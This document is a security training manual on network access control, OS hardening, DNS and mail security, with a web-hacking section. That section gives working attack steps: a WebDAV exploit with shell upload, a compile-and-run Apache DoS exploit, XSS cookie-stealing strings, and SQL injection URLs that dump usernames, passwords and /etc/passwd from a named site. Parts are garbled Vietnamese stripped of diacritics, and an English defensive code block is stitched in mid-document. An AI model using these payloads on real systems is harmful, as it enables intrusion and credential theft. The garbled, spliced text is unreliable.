kim tra. 1. Ci t Agent kim tra my tnh c m bo tnh an ton hanh khng. 2. NAC gateway s a ra Policy quyt nh my tnh c c truy cp vo nhng vng no. y ti trnh by mt bi vit v Cisco NAC, cc h thng khc hot ng tng t: Cisco NAC l mt cch trin khai Network Admission Control mt cch n gin, c s dng cho cu trc mng m bo cc chnh sch bo mt c p dng cho ton b cc thit b truy cp vo cc ti nguyn mng. Vi NAC, cc nh qun tr c th xc thc, u quyn, v nh gi, da trn cc kt ni s dng dy hay wireless, cc ngi dng truy cp t xa. N nhn din c cc thit b nh laptops, IP phones, hay cc my chi game, vi cc chnh sch bo mt v ngn chn cc nguy c tim n trong qu trnh truy cp d liu ca ngi dng Tc dng ca Network Admission Control D liu trong h thng mng b nhim virus hin nay l mt vn cn c quan tm mt cch thch ng, cc loi virus ngy cng c nh hng ln i vi h thng. Ti nguyn c s dng c bo m khng b nhim virus l mt yu cu v cn phi c thc hin, vi tnh nng chng virus hiu qu Network Admission Control l mt gii php. Cisco NAC gip m bo tnh trng ca cc my client trc khi truy cp vo mng. NAC lm vic vi mt chng trnh Anti-Virus to ra cc iu kin, cc chnh sch thit lp c cung cp cho cc my client trc khi chng truy cp vo cc ti nguyn mng. NAC m bo cc my client trong mng lun lun c cp nht cc bn nng cp cho phn mm dit virus mt cch tt nht. Nu client c mt yu cu cp nht bn nng cp, gii php NAC s mang n kh nng cung cp cp nht trc tip cho qu trnh cp nht t cc my client. Nu client c s xut hin t ngt virus c th gy ra nh hng i vi ton mng, NAC s chuyn my client n mt vng mng c cch ly hon ton cho n khi qu my client c kim tra mt cch k lng v m bo khng cn virus cng nh nhng kh nng nguy hai cho h thng mng. Cch lm vic ca Network Admission Control. 
Vic trin khai ng dng NAC c tch hp t nhiu giao thc hin nay thng s dng v cc sn phm ca Cisco vi mt vi sn phm v cc tnh nng nh: Cisco Trust Agent (CTA) and plug-ins Cisco IOS Network Access Device (NAD) Extensible Authentication Protocol (EAP) Cisco Secure Access Control Server (ACS)/Remote Authentication Dial-In User Service (RADIUS) Posture validation/remediation server Page | 152 Copyright by Tocbatdat


CTA communicates with other software on the client through an Application Program Interface (API) and reports its status in reply to requests from the NAD. CTA is required for communication in a NAC deployment (CTA talks to NAC using EAP over UDP). Software that includes a Posture Plug-In (PP) provides the interface to CTA. A PP is an agent running on software from another vendor that enforces the policies and reports the state of that software. In current NAC deployments the NAD is the Layer 3 Cisco IOS software in the devices that query the clients to discover them and control their use of EAP over UDP (EAP over UDP - EOU). This method differs from the components of the NAC solution shown in the figure below:

Figure: how NAC and its components work together:
1. The client sends a packet to a NAC-enabled router.
2. The NAD starts the posture-validation process using EOU.
3. The client sends the NAD, over EOU, a message carrying the credentials the NAD needs for posture validation.
4. The NAD forwards the message to Cisco ACS using the RADIUS authentication protocol.
5. Cisco Secure ACS requests posture validation over the Host Credential Authorization Protocol (HCAP) inside an HTTPS tunnel.
6. The server answers the request with one of: pass, fail, quarantine.
7. To permit or deny access to the network, Cisco Secure ACS sends a message with the corresponding ACLs/URL.
8. The NAD relays the message to the client.
9. The client is allowed access or is denied.

When a client sends a request to join the network (1), the NAD relays a "posture validation required" message (2). This is passed to CTA and, once received, on to Cisco Secure ACS; a Protected EAP (PEAP) session is then set up from CTA, after which the client's trust status, collected by the PPs on the client machine, is sent to the NAD (3) and forwarded to Cisco Secure ACS over RADIUS (4). Whether the client can be trusted is assessed from the state information of the software installed on it. Cisco Secure ACS checks and validates trust by comparing the client's state with the policies created in its database. Cisco Secure ACS can also be configured to forward the validation request to another server for validation (5). That exchange uses HCAP over an HTTPS tunnel. This is optional: client software with a PP and an external server used to validate the client's state. When an external server is used to validate the client's login, it then sends the validation result to Cisco Secure ACS. Cisco ACS then combines all the local policies with the policies checked on that server and returns the combined result for the client. Cisco Secure ACS then sends Access Control List (ACL) information to the NAD to enforce the policies for the client (8).

15. Operating system security
a. Securing the Windows operating system
Use trusted hardware
There is a lot of hardware today, such as RAM, USB devices, keyloggers and hard disks, that can steal a user's data, so choosing genuine hardware of clearly known origin is very important on every platform.
Use licensed Windows
Using a licensed copy of Windows lets you install patches and receive direct support from the vendor, which makes your system safer.
Enable automatic updates
Automatic updates should be enabled so that security vulnerabilities get patched.
Set up a firewall on the computer


The firewall on a computer protects it against threats such as attacks on security vulnerabilities and worm outbreaks. We should turn the firewall on and open only the applications and ports that we know are needed.
Lab: set up the firewall on a computer
Set strong passwords for every user
Users tend to choose simple passwords, and this is sometimes the path an attacker takes to break in. Windows passwords should be at least 7 characters long and include digits, upper-case letters, lower-case letters and special characters.
Lab: set a user account policy on the computer
Encrypt the disk with Microsoft's BitLocker feature
Windows from Vista onwards lets you encrypt the whole disk, which prevents data loss if the computer is lost or its lock screen is bypassed.
Install only software of clearly known origin
Turn off all unnecessary services and applications
This also removes a good part of the ways the computer can be attacked.
Install endpoint protection (Endpoint Security)
Protection products such as Kaspersky, Symantec and Trend monitor the whole computer, from I/O operations and reading and writing data to network access. Most threats to an endpoint are detected by this software.
Use secure network services
Exchanging information over insecure protocols such as telnet, pop3, smtp, ftp and http leads to your username/password being stolen. Choosing secure network protocols is also very important for protecting the computer.
Set up IPsec for insecure network services
When you must use services that send information insecurely over the network, you can use IPsec to encrypt the traffic. IPsec ensures that your data is always protected.
Create a domain-wide Group Policy to enforce a consistent usage policy


Use the computer in a safe environment
Safe Internet habits and a complete set of protection measures.
b. Lab: use an IPsec policy to protect some applications on Windows
c. Securing the Linux operating system
Use a Linux version distributed by a reputable organisation such as Red Hat, Ubuntu or a few other distributors.
Use the latest Linux kernel version.
When deploying a new service, check which vulnerabilities that service may have.
Use other security software installed on the Linux machine (Anti-Virus, IDS/IPS, Firewall).
Below I give a brief outline of using iptables to protect a Linux machine.

The iptables firewall on Red Hat
Linux kernel version 2.2.x was released with many new features that make Linux more reliable and support more devices. One of its new features is Netfilter iptables support inside the kernel, which handles packets more efficiently than the earlier tools, ipfwadm in kernel 2.0 and ipchains in kernel 2.2, while still supporting the old command sets. Building a packet-filtering firewall with ipfwadm or ipchains has many limitations: it lacks the hooks needed to extend its features, and packet filtering for common protocols and Network Address Translation (NAT) are done completely separately and cannot be combined. Netfilter and iptables in kernel 2.4 solve these limitations well and add many features that ipfwadm and ipchains lack.

Introduction to iptables
There are many firewalls on Linux. Among them, two that are configured and run from the console and are small and convenient are iptables and ipchains.

Netfilter/iptables
Iptables was written by the Netfilter Organization to add security features to Linux. Iptables is a very powerful packet-filtering firewall application available inside Linux kernels 2.2.x and 2.6.x. Netfilter/iptables has two parts: Netfilter inside the Linux kernel and iptables outside the kernel. Iptables handles the communication between the user and Netfilter, pushing the user's rules into Netfilter for processing. Netfilter filters packets at the IP layer. Netfilter works directly in the kernel, is fast and does not slow the system down. It was designed to replace ipchains in Linux 2.2.x and ipfwadm in Linux 2.0.x, and has more features than ipchains because it was built more sensibly, as the following points show:

What can Netfilter/iptables do?
- Build a firewall based on stateless and stateful packet filtering.
- Use the NAT and masquerading table to share network access when there are not enough network addresses.
- Use the NAT table to set up a transparent proxy.
- Help the iproute2 tool set build complex routing policies and QoS.
- Change (mangle) the TOS/DSCP/ECN bits of the IP header.
- Track connections and check many packet states. It does this for UDP and ICMP as well as for TCP connections; for example, the stateful ICMP filter only lets an echo reply in when a request was sent out, rather than blocking requests but still accepting replies on the assumption that they answer a ping. An unsolicited echo reply may be a sign of an attack or a back door.
- Simple handling of packets as they pass through the chains (a chain is a list of rules) INPUT, OUTPUT and FORWARD. On a host with several network interfaces, packets moving between interfaces travel only through the FORWARD chain rather than through all 3 chains.
- A clear separation between packet filtering and NAT (Network Address Translation).
- Connection rate limiting and logging. You can limit connections and log them to avoid denial-of-service attacks. It can filter on TCP flags and on physical (MAC) addresses.
- It is a stateful firewall, so it can track a connection for its whole lifetime, which makes it safer than a firewall with little state. Iptables has 4 tables, each with a default policy and rules in its built-in chains.

Ipchains
One of the programs Linux uses to configure the kernel's NAT table is ipchains. Inside the ipchains program there are 2 main scripts used to simplify administering ipchains. Ipchains is used to set up, maintain and inspect the IP firewall rules in the Linux kernel. These rules are divided into several groups of rule chains:
- IP input chain (rules applied to packets arriving at the firewall).
- IP output chain (rules applied to packets generated locally on the firewall and leaving it).
- IP forwarding chain (rules applied to packets forwarded to another host or network through the firewall).
- And user-defined chains.
Ipchains uses the concept of a rule chain to process packets. A chain is a list of rules for handling packets of one kind: incoming, forwarded or outgoing. The rules state which action is applied to a packet. The rules stored in the NAT table are pairs of IP addresses rather than individual IP addresses. A firewall rule specifies the packet criteria and a target. If the packet does not match, the next rule is examined; if it matches, the rule's target is applied: either a user-defined chain or one of the following values: ACCEPT, DENY, REJECT, MASQ, REDIRECT or RETURN.
- REJECT: like DENY, but the client is told that the packet was dropped.
- MASQ: used when the kernel is compiled with CONFIG_IP_MASQUERADE. With this target the packet is masqueraded as if it originated from the local machine; moreover, reply packets are recognised and automatically demasqueraded, bypassing the forwarding chain.
- REDIRECT: used when the Linux kernel is compiled with CONFIG_IP_TRANSPARENT_PROXY defined. With it, packets are delivered to a local socket even though they were sent to a remote host.

Commonly used syntax:
ipchains -[ADC] chain rule-specification [options]
ipchains -[RI] chain rulenum rule-specification [options]
ipchains -D chain rulenum [options]
ipchains -[LFZNX] [chain] [options]
ipchains -P chain target [options]
ipchains -M [-L | -S] [options]


16. Network security policy.
a. Requirements for building a network security policy.
Security for network infrastructure covers 4 areas:
- Security theory
- Attack skills
- Defensive configuration skills
- Writing information security policy

Building a network security policy is the step that completes a working environment that operates to a security standard. Many organisations in our country are now building their security policies to the ISO 27001 standard, using the ISMS model.
b. Overall process for building the policy:
Plan
- Define the objectives
- Identify and quantify information security risks
- Identify the requirements to comply with
- Write the policy
Do
- Design the system
- Deploy the policies and measures that protect the infrastructure
- Install servers securely
- Install workstations securely
- Install the information security protection applications
Check
- Test and assess information security
- Monitor and audit the system while it operates
Act
- Maintain the system
- Upgrade where necessary
Figure: the Plan-Do-Check-Act cycle

c. The ISMS
Figure: the ISMS model


d. The ISO 27000 series
When people speak of an ISMS they refer to the ISO/IEC 27000 series of standards, not to any single standard. The 27000 series has 21 standards, but the central idea, continuous improvement, is in ISO/IEC 27001. The ISO 27000 series includes:
* ISO/IEC 27000 - ISMS overview and vocabulary.
* ISO/IEC 27001 - ISMS requirements
* ISO/IEC 27002 - Code of practice for ISMS
* ISO/IEC 27003 - ISMS implementation guidance
* ISO/IEC 27004 - ISM measurement
* ISO/IEC 27005 - IS risk management
* ISO/IEC 27006 - Requirements for bodies auditing and certifying an ISMS
* ISO/IEC 27011 - ISM guidance for telecommunications organisations.
* ISO 27799 - ISM in healthcare using ISO/IEC 27002
* ISO/IEC 27007 - Guidance for ISMS auditing
* ISO/IEC 27008 - Guidance for auditors on ISMS controls
* ISO/IEC 27013 - Guidance on the integrated implementation of ISO/IEC 20000-1 and ISO/IEC 27001
* ISO/IEC 27014 - IS governance framework
* ISO/IEC 27015 - ISM guidance for finance and insurance
* ISO/IEC 27031 - Guidance on ICT readiness for BCM
* ISO/IEC 27032 - Cybersecurity guidance
* ISO/IEC 27033 - IT network security
* ISO/IEC 27034 - Application security guidance
* ISO/IEC 27035 - Security incident management.
* ISO/IEC 27036 - Security guidance for outsourcing
* ISO/IEC 27037 - Guidance on identifying, collecting and/or acquiring and preserving digital evidence.
Some standards are missing from this list (for example ISO 27012 for e-government) because they have not yet taken shape, or have not yet met the conditions to be promoted to a standard, as decided by the ISO and IEC technical committee. The standards 27033 and 27034 also have sub-standards, or parts, such as 27033-1 and 27034-5.

Where do you start with an ISMS?
An ISMS must start with learning the vocabulary (ISO 27000) used in the ISMS, so that everyone understands, thinks, expresses and presents things in the same way and no term is interpreted with several divergent meanings. However, for reasons of time, money and even arrogance, many organisations skip this step. The usual answer when the consultant asks for vocabulary training is "that is easy, we have read it already", but in reality hardly anyone has. Moreover, the main point is not to understand the vocabulary but to give all staff the same understanding. That is why ISMS efforts in these organisations often fail and become a formality: the views and understanding of each person and each level in the organisation differ. Newcomers are not trained either, so as employee turnover rises the way of thinking and the direction drift away from what they were at the start.

Does an ISMS need certification, and why?
An ISMS does not need certification; nowhere in the series is it required that an ISMS be certified. ISMS certification is voluntary. Many organisations wave an ISMS certificate to impress others, but anyone who knows the standard well finds that rather funny, because an ISMS shows commitment, not value.

Where does the value of ISMS certification lie?
It lies in the reputation of the certification body and of the auditors. In this field many auditors have less deep expertise than the organisation's own staff, which is why 27006 and 27008 regulate the audit. For the same reason large corporations do not need ISMS certification and assess themselves when they have good experts of their own.

After learning 27000, what next?
Auditors usually assess against 27001. If the ISMS is being implemented only to get by, it is enough to focus on 27001 and there is no need to learn 27000. If it is being implemented seriously, focus on 27002:
1. Risk assessment
2. Security policy
3. Organization of information security
4. Asset management
5. Human resources security
6. Physical and environmental security
7. Communications and operations management
8. Access control
9. Information systems acquisition, development and maintenance
10. Information security incident management
11. Business continuity management
12. Compliance
How are the 12 codes of practice of 27002 implemented? Implementing 27002 starts a repeating cycle over the 12 items above, that is, the 12 items are built and rebuilt again and again.


This is done according to 27003:
1. Introduction
2. Scope
3. Terms & Definitions
4. Structure of this Standard
5. Obtaining Management Approval for Initiating the Project to Implement an ISMS
6. Defining ISMS Scope and ISMS Policy
7. Conducting Organization Analysis
8. Conducting Risk Assessment and Risk Treatment Planning
9. Designing the ISMS

From the outside this looks like a purely management matter, but in practice the Organization Analysis part still lacks important links in the series that ISO/IEC is still building. That is why quite a few people mistakenly think an ISMS is only about management. I myself was wrong about this for a while.

IV. APPLICATION SECURITY
1. Securing the DNS application
The Domain Name System (DNS) is used to resolve host names to IP addresses on the Internet and on private TCP/IP networks. DNS servers are a frequent target of attackers, but you can secure these servers with the following methods:
a. Use a DNS forwarder

A DNS forwarder is a DNS server that performs DNS queries on behalf of other DNS servers. A DNS forwarder is used to take processing load off the DNS servers that forward their queries to it, and to build up a larger DNS cache on the forwarder.

Another function of a DNS forwarder is to stop the DNS servers that forward to it from interacting with DNS servers on the Internet themselves. This is especially important when the DNS server holds the resource records of the internal DNS domain. Instead of letting the internal DNS servers recurse and contact other DNS servers themselves, configure the internal DNS servers to use a forwarder for all domains for which they are not authoritative.

b. Use caching-only DNS servers.

A caching-only DNS server is a DNS server that is not authoritative for any DNS domain. It is configured to recurse or to use a forwarder. When it receives a reply it caches the result and passes the answer back to the system that sent the query. Over time it collects many DNS replies, which greatly reduces response time for the DNS clients of the caching-only server.

Caching-only DNS servers can improve company security when used as a forwarder under your own administrative control. Internal DNS servers can be configured to use the caching-only server as their forwarder, and the caching-only server recurses on behalf of the internal DNS servers. Using your own caching-only servers as forwarders improves security because you no longer depend on the provider's DNS servers as forwarders when you do not trust the security settings on their DNS servers.
c. Use a DNS advertiser

A DNS advertiser is a DNS server that answers queries for the domains for which it is authoritative. For example, if you host resources for domain.com and corp.com, the public DNS server is configured with DNS zone files for domain.com and corp.com.

The difference between a DNS advertiser and an ordinary DNS server that hosts zone files is that the advertiser answers only queries for the domains for which it is authoritative; it does not recurse to other servers. This prevents users from using the public DNS server to resolve other domain names, and improves security by reducing the risks of running a public DNS resolver (such as cache pollution).


d. Use a DNS resolver.

A DNS resolver is a DNS server that can recurse to resolve names in domains for which it is not authoritative. For example, you may have an authoritative DNS server on the internal network for the internal domain internalcorp.com. When a client on the network uses this DNS server to resolve quantrimang.com, the DNS server recurses by looking the answer up on other DNS servers.

The difference between that DNS server and a DNS resolver is that the resolver is dedicated to resolving Internet host names. The resolver can be a caching-only DNS server that is not authoritative for any DNS domain. The administrator can allow only internal users to use the DNS resolver, or allow only external users (which provides security when using an external DNS server outside the administrator's control), or allow both internal and external users to use the DNS resolver.
e. Protect the DNS cache

DNS cache pollution is a common problem. Most DNS servers cache the results of DNS queries before returning the reply to the host that sent the query. The DNS cache greatly improves DNS query performance. If the DNS server's cache is polluted with bogus DNS entries, users can be redirected to malicious web sites instead of the sites they intended to visit.

Most DNS servers can be configured to prevent cache pollution. For example, the Windows Server 2003 DNS server is configured by default to prevent cache pollution. If you are using a Windows 2000 DNS server, you can enable the protection by opening the Properties dialog of the DNS server, selecting the Advanced tab, ticking the Prevent Cache Pollution box and restarting the DNS server.
f. Secure DDNS connections

Many DNS servers allow dynamic updates. Dynamic update lets these DNS servers register the DNS host name and IP address of hosts that receive their IP address from a DHCP server. DDNS can be an effective administration aid compared with manually configuring DNS resource records for these hosts.

However, unchecked DDNS updates can cause a security problem. A malicious user could configure a host to dynamically update the DNS records of a server (such as a file server, web server or database server) and redirect connections meant for that server to their own PC.

You can reduce the risk of malicious DNS updates by requiring secure connections to the DNS server for dynamic updates. This is easy to do by installing the DNS server with Active Directory-integrated zones and requiring secure dynamic updates. After this configuration all domain members can update DNS information dynamically and securely.
g. Stop zone transfers

Zone transfers take place between primary and secondary DNS servers. Primary DNS servers authoritative for particular domains hold writable DNS zone files that are updated when needed. Secondary DNS servers receive a read-only copy of these zone files from the primary DNS server. Secondary DNS servers are used to improve DNS query performance within an organisation or on the Internet.

However, zone transfers are not limited to secondary DNS servers. Anyone can issue a DNS query that makes a DNS server configured to allow zone transfers dump its whole zone file. Malicious users can use this information to survey the naming scheme inside the company and attack key infrastructure services. You can prevent this by configuring the DNS server to refuse zone transfer requests, or to allow zone transfers only to specific servers and refuse all other requests.
h. Use a firewall to control DNS access

A firewall can be used to control which users may connect to a DNS server. For DNS servers used only for queries from internal clients, the administrator should configure the firewall to block connections from external hosts to these servers. For DNS servers used as caching forwarders, the firewall should be configured to accept DNS queries only from the DNS servers that use them as caching forwarders. A very important firewall policy setting is to block internal users from using the DNS protocol to connect to external DNS servers.

i. Set access controls on the DNS server's Registry settings


On Windows-based DNS servers, access controls should be configured on the Registry settings related to the DNS server so that only the accounts that need access can read or change those settings.

The DNS key under HKLM\CurrentControlSet\Services should be configured to allow access only to administrators and the system account, and these accounts should be granted Full Control.

j. Set access controls on the DNS file system

On Windows-based DNS servers, you should configure access controls on the file system related to the DNS server so that only the accounts that need access to those files can read or change them.

The %system_directory%\DNS folder and its subfolders should be set to allow access only to the system account, and the system account should be granted Full Control.
2. Securing web applications
a. Introduction
Usually, to hack a web server, a hacker first finds out what operating system the web server runs and what services run on it. The operating system is typically Windows 2000 Server, Windows 2003 Server, Red Hat and so on; the services include Apache, IIS, FTP servers and so on. If one of the operating system's services, or another service, has a vulnerability, it can lead to loss of control over the system. In the practical exercise of this section, the author introduces the operating system vulnerability DCOM and the application vulnerabilities in Serv-U and Apache (FTP Server). With these vulnerabilities the victim machine can be fully controlled.
b. Vulnerabilities in web services
- Vulnerabilities at the operating system layer
- Vulnerabilities in web services
- Vulnerabilities in the web application


c. Exploiting vulnerabilities at the operating system layer, and securing the web server
Vulnerabilities in the Windows or Linux operating system mostly occur in services that allow remote access (RPC, SSH, Telnet). Below is a report from a Nessus scan of the operating system:

When a vulnerability rated high or above is present, the system can be fully compromised:


A successful attack exploiting Microsoft vulnerability MS08-067


Securing the web server at the OS layer
Apply the operating system hardening steps from the earlier part of this document to obtain a secure operating system.
d. Exploiting vulnerabilities in the web service
Using ActivePerl, the exploit code file.pl and a shell downloaded from the many available on the Internet to exploit the IIS WebDAV vulnerability:
Step 1: Install ActivePerl
Step 2: Copy the file tocbatdat.pl (the attack file)
Step 3: Upload the shell rhtools.asp


Step 4: Access the server through the shell

To close this hole, a secure version of the web service must be used.


e. Exploiting the DoS vulnerability in Apache 2.0.x-2.0.64 and 2.2.x-2.2.19
Quite a few machines on the Internet still have this vulnerability; on an affected system an attacker can hang the web service with a single command, and at present there is no patch for it:
Step 1: Download the code from http://www.exploit-db.com/exploits/18221/
Step 2: Save it as a C file named rcvalle-rapache.c
Step 3: Compile the C file into an executable with this Linux command
gcc -Wall -pthread -o rcvalle-rapache rcvalle-rapache.c

Step 4: Run the program
Linux# ./rcvalle-rapache IP

f. Exploiting vulnerabilities in the web application
Web applications normally use the input data in HTTP requests (or in files) to decide what to send back. An attacker can modify any part of an HTTP request, including the URL, query string, headers, cookies, form fields and even hidden fields, to bypass security mechanisms. Common attacks of this kind include:
- Arbitrary operating system command injection
- Cross-site scripting
- Buffer overflow
- Format string attacks
- SQL injection
- Cookie poisoning
- Hidden field manipulation
In this exercise we try out the vulnerabilities Cross-Site Scripting, Format string, Cookie Manipulation and Authorization Failure.
Cross-site scripting
First we log in with username jv and password jv789 and choose the post message function. Then we post a script in the message text and submit the post. We press F5 to refresh the browser and see it appear.


Now the victim's browser unknowingly runs the script that the user posted to the server. With such a script an attacker can steal the victim's cookie and log in to the system.
Test strings for XSS:
"><script>alert('hey')</script>
http://ha.ckers.org/xss.html (XSS cheat sheet)
"><script>exec(%systemroot%\system32\cmd.exe)</script>
"><script>while(1){alert('hey')}</script> (infinite loop)
"><script>alert(document.cookie)</script>
LeapLastLogin=20090523152133; PHPSESSID=28026127959bf076767f3adac1c736d5
Introduction to SQL injection:
This attack technique abuses vulnerabilities in the application (failure to check the characters entered by the user carefully). It works by adding code to SQL statements or queries (through text boxes) before they are passed to the web application for processing. From what the server executes and returns to the browser (query results or error messages), the attacker can gather data, run commands (in some cases) and eventually take control of the system. Here are some basic techniques.
Example: exploiting a SQL injection vulnerability in MySQL and PHP
http://tocbatdat.edu.vn/?show=news&ic=3&list=8_148&lg=1
Check the website for the vulnerability
Find how many columns there are: 1 order by 30
Find the injectable column: 1 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
Column 4 is found to be the injectable one; the next step is the exploitation itself:
Exploit
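Before the exploitation steps that follow, here is the defender's side of the two web-application defects discussed above, XSS and SQL injection, as an added example that is not part of the original page. The Python below builds a small in-memory SQLite database (constructed, not the site named on the page), shows the concatenated query in which a UNION probe of the kind shown above turns a news lookup into a dump of another table beside the parameterized query that treats the same input as a plain value, and shows a message renderer that escapes the posted script so the browser displays it instead of running it, together with the HttpOnly flag that keeps the session cookie (PHPSESSID on the page) out of document.cookie. Table, column and account names are assumptions made for the example.

```python
"""Added example (not from the original page or the site it names):
the vulnerable and hardened forms of SQL injection and XSS handling.
The database, table and account names are constructed for the example."""
import html
import sqlite3

# Inputs of the kind shown on the page: a UNION probe and a script in a message.
SQLI_INPUT = "1 and 1=0 union select 1,username,password from users-- "
XSS_INPUT = '"><script>alert(document.cookie)</script>'

def make_db():
    """In-memory SQLite stand-in for the site's database (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER, title TEXT, body TEXT);
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO news VALUES (1, 'Welcome', 'first post');
        INSERT INTO users VALUES (1, 'admin', 'hash-of-admin-password');
    """)
    return conn

def news_vulnerable(news_id):
    """The defect: the request parameter is pasted into the SQL text, so the
    UNION in SQLI_INPUT becomes part of the query and reads the users table."""
    sql = "SELECT id, title, body FROM news WHERE id=" + news_id
    return make_db().execute(sql).fetchall()

def news_safe(news_id):
    """The fix: validate the type and bind the value; the SQL text never changes."""
    try:
        wanted = int(news_id)
    except ValueError:
        return []                      # not a number: reject, never interpolate
    sql = "SELECT id, title, body FROM news WHERE id=?"
    return make_db().execute(sql, (wanted,)).fetchall()

def render_message_vulnerable(text):
    """The defect: the posted message is echoed into the page unchanged."""
    return '<div class="message">' + text + "</div>"

def render_message_safe(text):
    """The fix: HTML-escape on output, so <script> is shown as text, not run."""
    return '<div class="message">' + html.escape(text, quote=True) + "</div>"

def contains_script_tag(rendered_html):
    """Crude check used only to contrast the two renderers."""
    return "<script" in rendered_html.lower()

def session_cookie_header(session_id):
    """HttpOnly keeps the session id out of document.cookie; Secure limits it to HTTPS."""
    return "Set-Cookie: PHPSESSID=%s; HttpOnly; Secure; SameSite=Lax" % session_id
```

The escaping belongs at output time and must match the context (HTML body here; attribute, URL and JavaScript contexts each need their own encoding), and the HttpOnly flag does not stop the script from running, it only denies it the cookie; the parameterized query is the complete fix for the injection because the database receives the value separately from the statement and never parses it as SQL.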


Step 1: Show the tables
1 and 1=0 union select 1,database(),3,group_concat(unhex(hex(table_name))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from information_schema.tables-- &catid=20
Step 2: Show the columns with group_concat(unhex(hex(column_name)))
http://www.tocbatdat.edu.vn/index.php?lg=1 and 1=0 union select 1,database(),3,group_concat(unhex(hex(column_name))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from information_schema.columns where table_name=char(106, 111, 115, 95, 117, 115, 101, 114, 115)-- &catid=20
Step 3: Dump the data
http://www.tocbatdat.edu.vn/index.php?lg=1 and 1=0 union select 1,database(),3,group_concat(username,0x2f,password,0x2f,email,userType),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from jos_users-- &catid=20
Step 4: Read a system file
http://www.tocbatdat.edu.vn/index.php?lg=1 and 1=0 union select 1,database(),3,load_file(char(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- &catid=20
http://tocbatdat.edu.vn/?show=news&ic=3&list=8_148&lg=1%20and%201=0%20union%20select%201,2,3,4,group_concat%28TenDN,0x2f,MatKhau%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20maxcare_tbadmin-

3. Mail server security
a. Overview of SMTP, POP and IMAP
a.1 Architecture and operation of electronic mail
To send email the sender needs an account on a mail server. A server can have one or more accounts, each with a different name (the user).


Each account has its own mailbox. Usually the mailbox name is the same as the account name. The computer must also be connected directly or indirectly to the Internet to send and receive email worldwide. A home computer user can still send and receive email by connecting their computer to another computer with a modem. Some places provide free email accounts that home computers can use by connecting with a modem to a dedicated mail computer, such as hotmail.com or yahoo.com. There are also many commercial organisations that provide the service or an account to home computers, but the user pays a monthly fee.
The path of a message
Email travels from one mail server to another across the Internet. When a message arrives at its destination it is held in the mailbox on the mail server until the recipient picks it up. The whole process takes only a few minutes, so it lets people anywhere in the world communicate quickly at any time of day or night.
Sending, receiving and relaying mail
To receive email you need an email account, that is, an address at which to receive mail. One advantage over ordinary post is that you can receive email from anywhere: you only need to connect to the mail server to fetch mail to your computer. To send mail you need an Internet connection and access to the mail server that will relay the message. The standard protocol used to send mail is SMTP (Simple Mail Transfer Protocol). It is combined with the POP (Post Office Protocol) and IMAP protocols for fetching mail.
The mail server system model:


For a mail server system serving a small or medium-sized organisation, the whole system is usually integrated into one server, which receives and sends mail, stores the mailboxes and controls inbound and outbound mail.
- SMTP is used to transfer mail between mail servers.
- SMTP is used to let the mail client send mail to the server.
- POP or IMAP is used by the mail client to fetch mail.
a.2 Introduction to the SMTP protocol
Introduction
The goal of SMTP is to transfer email reliably and efficiently. SMTP is independent of the underlying subsystem and requires only a reliable data channel. An important feature of SMTP is its ability to relay mail across transport service environments. A transport service provides an inter-process communication environment (IPCE). An IPCE may cover one network, several networks, or a subnet of a network. An IPCE can be understood as an environment in which one process can communicate directly with another. Importantly, IPCEs are not in one-to-one correspondence with networks. A process may communicate directly with several other processes through an IPCE. Mail is an application of inter-process communication. Mail can be transferred between processes on different IPCEs by a process that is connected to two (or more) IPCEs. More specifically, email can be relayed across hosts on different transport systems through intermediate hosts.
The SMTP model
SMTP is designed around the following communication model:
- When a user requests that mail be sent, the SMTP sender establishes a two-way channel to the SMTP receiver.
- The SMTP receiver may be the final destination or only an intermediate hop.
- The SMTP sender sends SMTP commands to the SMTP receiver.
- The SMTP receiver responds to the SMTP commands by returning the corresponding SMTP replies to the sender.
Once the channel is established, the SMTP sender sends a MAIL command identifying the sender. If the SMTP receiver accepts the mail it responds with an OK reply. The SMTP sender then sends an RCPT command identifying the recipient; if the SMTP receiver accepts mail for that recipient it replies OK, otherwise it replies that the mail is rejected. If the SMTP receiver replies OK, the SMTP sender sends the mail data and ends it with a special command. If the SMTP receiver processes the mail data successfully it replies OK.

[TL: o to v An ton thng tin cho ABC

6, 2012

- SMTP cung cp nhiu k thut cch khc nhau gi mail: o Truyn thng khi host pha gi v host pha nhn c kt ni ti cng mt dch v truyn ti. oThng qua cc my ch SMTP khi host pha gi v host pha nhn khng c kt ni ti cng mt dch v truyn ti.i s cho mail command l 1 tuyn ngc (reverse-path), trong ghi r mail c gi t ai. i s cho RCPT command l mt tuyn chuyn tip (forward-path), ch ra mail c gi cho ai. Tuyn chuyn tip l 1tuyn ngun, trong khi cc tuyn ngc l 1 tuyn quay tr (c th c dng tr li mt thng bo cho ngi gi khi mt li xy ra vi mt message chuyn tip). Khi cng mt message c gi n nhiu ngi nhn, SMTP khuyn khch vic truyn ti ch c mt bn sao ca cc d liu cho tt c cc ngi nhn ti cng mt my ch ch. Cc mail command v reply c mt c php cng nhc. Cc reply cng c 1 m s. Trong phn sau y, m xut hin cc v d thc t s dng cc mail command v reply, cc danh sch y cc command v reply. Cc command v reply khng phi l trng hp nhy cm. Tc l, mt t command hoc reply c th l ch thng, hoa, hay hn hp. Lu rng iu ny l khng ng vi tn ngi s dng hp th. V i vi mt s my tn ngi s dng l trng hp nhy cm, v cc trin khai SMTP phi a trng hp ny ra bo v cc trng hp tn ngi dng ging vi cc tham s trong mailbox. Tn my ch khng phi l trng hp nhy cm. Cc command v reply l gm cc k t ASCII. Khi dch v chuyn th cung cp 1 knh truyn 1 byte 8bit (octet), mi k t 7 bit c a vo cc bit thp ca octet, bit cao ca octet xa v 0. Khi c th ha cc dng chung ca mi lnh v reply, 1 i s s c biu din bng 1 bin(hay 1 hng) trong ngn ng meta , chng hn, <string> hoc <reverse-path> Khi xc nh cc hnh thc chung ca mt lnh hoc tr li, mt i s. y cc du < cho bit y l bin trong ngn ng meta. Page | 178 